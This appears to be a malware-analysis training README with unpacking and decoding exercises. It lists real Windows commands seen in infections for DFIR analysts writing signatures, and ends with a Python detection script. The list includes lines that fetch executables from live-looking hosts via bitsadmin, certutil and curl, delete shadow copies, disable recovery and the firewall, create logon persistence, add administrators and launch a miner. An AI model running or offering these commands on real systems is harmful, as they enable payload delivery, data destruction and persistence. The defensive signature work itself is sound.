Unpack Me

Unpacking is fun! (or not :P)
pwd : infected

UPX
ConfuserEx
ILprotector
Phoenix Protector

Decompress Me

Sometimes attackers send password-protected archives by email.
The problem is... when the analyst receives the archive, the customer forgot to forward the email that contains the password...
So if you must analyze the sample, the only thing left to do is find the password \o/

Case 01
Case 02
Case 03

Decode Me

Disclaimer: these are real cases of malicious encoded commands used during infections.
It's highly recommended to handle them in a Virtual Machine!
I am not responsible for your acts.
pwd : infected

Case 01
Case 02
Case 03
Case 04
Case 05
Case 06
Case 07
Case 08
Case 09
Case 10
Case 11
Case 12
Case 13
Case 14
Case 15
Case 16
Case 17
Case 18
Case 19
Case 20
Case 21

Examples of commands used by Attackers

For DFIR / CERT / SOC analysts, this is a good starting point for writing signatures and learning how attackers use built-in tools.

Disclaimer: these are real cases of commands (benign or malicious).
I am not responsible for your acts.

attrib +h "%APPDATA%\tmp_000"
attrib +r +a +s +h "%APPDATA%\Adobe Reader\ADBR\READER"
attrib +s +a %WINDIR%\Fonts
attrib +s +h +r "%APPDATA%\Process\*.*"
attrib -r -a -s -h -i /s C:\Users\%OSUSER%
autorun.exe "SFXSOURCE:%TEMP%\Temp\chewvga.EXE"
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled No
bitsadmin /complete QaeGF
bitsadmin /create /download QaeGF
bitsadmin /setcustomheaders QaeGF User-Agent:LACARNECOTTA
bitsadmin /transfer AE /priority foreground https://jgc.com.mx/dat/heavy.jpg %USERPROFILE%\document.exe
bitsadmin /Resume wstatus
bitsadmin /SetNotifyCmdLine wstatus "%ALLUSERSPROFILE%\Oracle\hok\jahok.exe" "update"
bitsadmin /cancel drp_bits_job
bitsadmin /transfer Nv /priority foreground http://154.16.201.215:2330/ari.exe %USERPROFILE%\RK.exe
cacls %ALLUSERSPROFILE%\expl0rer.exe /d everyone
cacls C:\Users\%OSUSER% /T /C /P %OSUSER% :F
certutil -addstore "Root" p.pem
certutil -addstore -f "TrustedPublisher" "%PROGRAMFILES%\OpenVPN Technologies\PrivateTunnel\Cert\OpenVPNTechForTap6.cer"
certutil -decode %TEMP%\B %TEMP%\y.bat
certutil -A -n "root" -t "TCu,Cuw,Tuw" -i "rootcert.cer" -d "%APPDATA%\Mozilla\Firefox\Profiles/fg6ygf16.default"
certutil -f -addStore root "%TEMP%\is-5OHTO.tmp\BaltimoreCyberTrustRoot.crt"
certutil -f -decode %ALLUSERSPROFILE%\Windows\Microsoft\java\dUpdateCheckers.base d.ps1
certutil -urlcache -split -f http://cache.windowsdefenderhost.com/windows/RecentFileProgrom.exe "C:\\Windows\\Fonts\\RecentFileProgrom.exe"
choice /C Y /N /D Y /T 3
choice /t 3 /d y /n
cmstp.exe /s /ns "%APPDATA%\Microsoft\10850.txt"
cmstp.exe /s /su /ns df81c455-615e-4add-92e3-ce4a12d882d8.inf
conhost.exe "-1036909723-245440756159895655010408828331479810903-3149622581357818589-674575599"
conhost.exe schtasks /create /tn "svchost" /tr "%WINDIR%\resources\svchost.exe" /sc daily /st 17:00 /f
csc.exe /noconfig /fullpaths @"%TEMP%\-h_g5jfn.cmdline"
cscript %TEMP%\file.vbs
cscript //nologo \\tK2PgXIebP\BIN\PreviousDate.vbs
csv.exe %TEMP%\83890727\AARIA
csv.exe dic=ngi
curl.exe -o new.exe http://down.pzchao.com:18559/new.exe
curl.exe -o pass32.exe http://down.pzchao.com:18559/pass32.exe -u 123:456
cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1055.tmp" "%TEMP%\CSC1036.tmp"
delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Windows Defender" /f
delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f
devcfg.exe -add net vnet %PROGRAMFILES%\ShrewSoft\VPN Client\drivers\virtualnet.inf
dllhost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
dw20.exe -x -s 1080
explorer.exe /c, "%APPDATA%\Microsoft\Windows\Start Menu\Programs\scanned.exe"
explorer.exe schtasks /create /tn "svchost" /tr "%WINDIR%\resources\svchost.exe" /sc daily /st 14:59 /f
find "."
find /i " "
find /i " 1"
find /i ".exe"
find /i "\\"
findstr /i "ping"
findstr 0.0.0.0.*0.0.0.0
findstr [0-99]
findstr.exe findstr /C:"-"
icacls . /grant Everyone:F /T /C /Q
ipconfig /all
ipconfig /flushdns
javaw.exe -jar "C:\07afffd621bd06f571b35fac6266abcec66ca8711102dd9a5e500ee897735190.jar"
mshta.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
msiexec /i "%TEMP%\VCRedist\VCRedist_2005_x86\8.0.50727.6195\vcredist.msi" /qn
msiexec /quiet /uninstall {70895169-F9EC-432C-9FC9-4F4761019739}
msiexec /x "\\atbwfs100\Sourcing\Fit Tracking\03152007\FitTrackingUI.msi" /qn
net config workstation
net localgroup "Remote Desktop Users" Matthew /add
net localgroup administrators Matthew /add
net session
net start "Data Sharing Service"
net stop TeamViewer
net stop osppsvc /y
netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="%TEMP%\7ZipSfx.001\bin\tools\aria2c.exe"
netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state on
netsh int ipv6 isatap show state
netsh int tcp reset
netsh int tcp set heuristics disabled
nslookup -q=txt djowy612ygosvyd.com 208.67.220.220
nslookup -type=a %OSUSER%.check.francefriends.tk.
nslookup ransomware.bit ns1.wowservers.ru
nssm.exe /install /silent "iSASService" %PROGRAMFILES%\Java\jre1.8.0_25\bin\java.exe
ping -n 0 localhost
ping -n 1 127.0.0.1
ping -n 2 -w 1000 127.0.0.1
ping -t 2 -l 10 127.0.0.1
ping google.com
powershell.exe "-file" "C:\01674bf1099edd830c974553a4de062f42c5e6759adb6b4da7aadfdd838cc00c.ps1"
reg delete "HKCU\Software\Microsoft\Office\12.0\Word\Resiliency" /F
reg delete "HKCU\Software\Microsoft\Office\15.0\Word\Resiliency" /F
reg import %TEMP%\7ZipSfx.001\bin\Tools\\patch.reg
reg query "HKCU\Control Panel\International" /v sShortDate
regsvr32.exe /n /s "%TEMP%\instx86.tmp" /i:"/cp"
rundll32.exe %APPDATA%\ekcwlvi.dll f1
rundll32.exe %WINDIR%\system32\shell32.dll,OpenAs_RunDLL %TEMP%\rad3FE20.tmp
rundll32.exe shell32.dll,Control_RunDLL input.dll
sc.exe delete TeamViewer
sc.exe start TeamViewer
sc.exe stop TeamViewer
schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\sxstruse.exe /p everyone:F"
schtasks.exe "schtasks" /create /tn "NRAT Client Startup" /sc ONLOGON /tr "%APPDATA%\Google\chrome.exe" /rl HIGHEST /f
schtasks.exe "schtasks" /create /tn "Windows© " /sc ONLOGON /tr "%APPDATA%\winfile\Microsoft©.exe" /rl HIGHEST /f
schtasks.exe "schtasks" /delete /tn "WebDiscover Browser Launch Task" /f
schtasks.exe /Create /RU system /SC ONLOGON /TN Microsoft\WindowsDifenderUpdate /TR "wscript %ALLUSERSPROFILE%\WindowsNT\WindowsNT.vbs" /F
schtasks.exe schtasks /delete /tn "Adobe Flash Player Updaters" /f
schtasks.exe schtasks /delete /tn "Microsoft\Windows\orangeinside" /f
schtasks.exe schtasks /delete /tn "Printerceptor" /f
schtasks.exe schtasks /delete /tn "\Microsoft\Windows\WDI\Adobe\Adobe Flash Updaters" /f
schtasks.exe schtasks /delete /tn 360 /f
schtasks.exe schtasks /delete /tn AutoKMSK /f
schtasks.exe schtasks /delete /tn AutoKMSKK /f
schtasks.exe schtasks /delete /tn SogouImeMgr /f
shutdown /p /f
shutdown -a
shutdown -r -f -t 5
shutdown -s -f -t 0
shutdown -s -t 100
shutdown /s /t 600 /f
ssh-keygen.exe -b 1024 -t dsa -f /ssh_host_dsa_key -N ""
subst.exe subst b: C:\
svchost.exe -k
takeown /f %WINDIR%\system32\Drivers\etc\hosts /a
taskkill /im rundll32.exe /f /T
tasklist /nh /fi "imagename eq .exe"
timeout /t 1 /nobreak
timeout /t 300
vbc.exe -o xmr.pool.minergate.com:45700 -u 1LwkS2UaXY5hrRxR7Kdxo625v41zeHGjxL --cpu-priority 3 --max-cpu-usage 75 --donate-level 1 -p x -t 2
vbc.exe /noconfig @"%TEMP%\apzjg8gs.cmdline"
vbc.exe /shtml "%TEMP%\v0xrvacf.goc"
vbc.exe /stext "%TEMP%\holdermail.txt"
vssadmin Delete Shadows /All /Quiet
vssadmin delete shadows /all
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
wget.exe http://127.0.0.1:9527 -o "C:\\TestWget.txt" -t 1
wmic /node:localhost /namespace:\\root\SecurityCenter2 path FirewallProduct get /format:list
wmic OS get Caption /value
wmic PAGEFILESET GET MaximumSize /value
wmic computersystem get domain
wmic logicaldisk where "DeviceID='C:'" get size
wmic nicconfig where(ipenabled=true) get index
wmic path Win32_Processor get Name /value
wmic path Win32_Processor get NumberOfCores /value
wmic process where "name='conhost.exe' and ExecutablePath='C:\\windows\\Installer\\conhost.exe'" call Terminate
wmic shadowcopy delete
wscript //Nologo "%PUBLIC%\Temp\%OSUSER%.vbs" CxNqfVybn9rBTqHTjjIhA3jiooCiJP5DlgROv3L5qhFsDi4GcAM
wscript /b %ALLUSERSPROFILE%\Windows\Microsoft\java\GoogleUpdateschecker.vbs
wscript /e:VBScript.Encode %TEMP%\SysinfY2X.db
wscript bnbgpnhp.js
xcopy /l /w "%TEMP%\4064BQBC.bat" "%TEMP%\4064BQBC.bat"
xcopy /Y /I /S "%TEMP%\NS-1Q8EJ.tmp\tmp\*" "%TEMP%\nsa694.tmp\"
xcopy /Y /I /S "%TEMP%\NS-2QOKH.tmp\tmp\*" "%TEMP%\nsa796.tmp\"
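As an added example (not code from the original repository), a small Python triage script that tags command lines with the behaviours visible in the list above (shadow copy deletion, recovery tampering, LOLBin downloads, certutil decoding, firewall disabling, logon-task persistence, local admin additions, script hosts launched from user directories). The rule names are my own labels, and the constructed sample reuses lines from the list with the download host replaced by example.invalid.

```python
import re

# Detection rules for command-line patterns drawn from the list above.
# Each rule is (name, case-insensitive compiled regex); names are my own labels.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\b(vssadmin\s+delete\s+shadows|wmic\s+shadowcopy\s+delete)\b", re.I)),
    ("recovery_tampering",
     re.compile(r"\bbcdedit\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("lolbin_download",
     re.compile(r"\b(bitsadmin\s+/transfer|certutil\b.*-urlcache|curl(\.exe)?\s+-o|wget(\.exe)?\s+https?://)", re.I)),
    ("certutil_decode", re.compile(r"\bcertutil\b.*-decode\b", re.I)),
    ("firewall_disabled",
     re.compile(r"\bnetsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off\b", re.I)),
    ("scheduled_task_persistence",
     re.compile(r"\bschtasks(\.exe)?\b.*/create\b.*(/sc\s+onlogon|%APPDATA%)", re.I)),
    ("local_admin_added",
     re.compile(r'\bnet\s+localgroup\s+"?(administrators|remote desktop users)"?\s+\S+\s+/add\b', re.I)),
    ("script_host_from_user_dir",
     re.compile(r"\b(wscript|cscript|mshta)(\.exe)?\b.*%(TEMP|APPDATA|ALLUSERSPROFILE|PUBLIC)%", re.I)),
]

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(cmdlines):
    """Map each matching command line to its rule names; clean lines are dropped."""
    return {line: names for line in cmdlines if (names := classify(line))}

# Constructed sample: command lines copied from the list above plus two benign
# ones; the example.invalid host replaces the original download URL.
SAMPLE = [
    r"vssadmin Delete Shadows /All /Quiet",
    r"bcdedit /set {default} recoveryenabled No",
    r"bitsadmin /transfer Nv /priority foreground http://example.invalid/ari.exe %USERPROFILE%\RK.exe",
    r"certutil -decode %TEMP%\B %TEMP%\y.bat",
    r"netsh advfirewall set allprofiles state off",
    r'schtasks.exe "schtasks" /create /tn "NRAT Client Startup" /sc ONLOGON /tr "%APPDATA%\Google\chrome.exe" /rl HIGHEST /f',
    r"net localgroup administrators Matthew /add",
    r'mshta.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"',
    r"ipconfig /all",
    r"net config workstation",
]

if __name__ == "__main__":
    for line, names in scan(SAMPLE).items():
        print(", ".join(names), "<-", line)
```

Feed it the command-line field of process-creation telemetry (Sysmon event ID 1 or Windows 4688) to turn the list into a first-pass hunting filter.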